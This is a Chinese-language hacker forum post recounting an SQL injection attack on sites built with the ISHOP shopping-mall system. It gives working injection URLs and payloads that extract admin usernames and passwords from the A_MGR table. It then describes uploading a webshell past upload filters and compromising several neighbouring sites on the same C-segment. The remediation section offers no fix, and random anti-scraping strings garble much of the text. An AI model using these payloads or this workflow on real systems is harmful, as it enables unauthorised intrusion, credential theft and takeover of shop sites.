ISHOP商场建站系统注入漏洞

admin

发现一个注入点
% j& N9 z/ i( c. shttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
* a3 W( K% r  D; |
" Y! n( q, N% W6 G5 A习惯性的加’having1=1--

) l1 l! @' P9 {1 K! ~5 {0 phttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
, q; w% I8 |& T6 A
0

爆出Diary_A.dl_Title（这时候很激动啊）
1 V9 f4 M9 }) ]# O
那么继续
, u$ e5 y# \: n0 C& l% F" ?$ _4 bhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
3 V  k9 ?$ z1 C! S$ R$ Z0 q# s
1 S' }1 F* C0 w% Q继续，一直爆下去
: A/ Y' `( _" I) Y4 @& m! {3 w4 Y
! C1 P/ {3 z) {( g爆到几个字段和表段 但是没找到需要的管理用户的字段
& x2 b# D% a' [6 I: b  s: u$ Y: X
蛋疼了 怎么办 然后去后台登陆页看源码
: b: S" p9 D" d0 f' B5 `
0
2 k: d2 d: H0 G
Input name= “ADUID”
4 g! z1 ~- W6 w* z! @; w3 u9 WInput name= “ADPWD”
8 S2 i5 @8 L; ^
" Q! O4 ~' O1 ~* E+ d! o9 [& ]很幸运 找到了字段那就继续
找到之后开始爆用户
$ z+ y  w# v& s: l4 S0 Ehttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
爆密码
1 I7 b' o4 z: ?% k" ~http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
测试了下 这个注入点只能爆到文章哪里的表

- f0 r" M$ `6 g1 \头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了

又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了

473

) Q  v( o; U6 W; x: o: f; x进后台


发现几个上传点 有的地方不能上传 而且防止恶意代码

没办法 各种百度各种找大牛 找到一只好像可以突破的马

4 N' ^0 l* J! j* J" i2 I- h0 i7 ]
在系统管理那里直接上传 不过没有显示地址

再上传一次 抓包 搞定OK
3 L" }; a6 v" y

. x; G7 U" w- D& \# [3 x% \
472

晚上不行了 去睡觉。。。
第二天刚起床 闲的没事做继续日站吧
* W& s) Z+ r5 N. |
' s; `) D% Y" |. Z8 G: C3 |找个站 就把这个站的旁c扫了下
' M5 C9 t- f9 ?! S: R- m4 V( a
$ P7 T& k7 Z, B* ]3 @  n发现c段也有一个购物站 ，然后还和这个站的模板差不多

就找到会员登录口测试

'and (select top 1 MGR_UID from A_MGR)>0—
果断爆到了 这时候我很激动 通杀
8 ]! Z! X3 z# I& |! }+ @+ B( ~0 ^
再次翻c段
. O! n* Q# o- |9 d. U) r
翻出几个站 都成功拿下

% Q: h) S; u' x: m
- _/ a9 `2 P2 d  H7 I2 x8 k. ^
, V- F8 O8 J; M# m" A修复方案：
他们比我专业
; `% K0 b! D+ [( p4 X& Q/ I​
( U8 [6 p, P$ h7 p9 _

, r) u2 x+ P! L$ O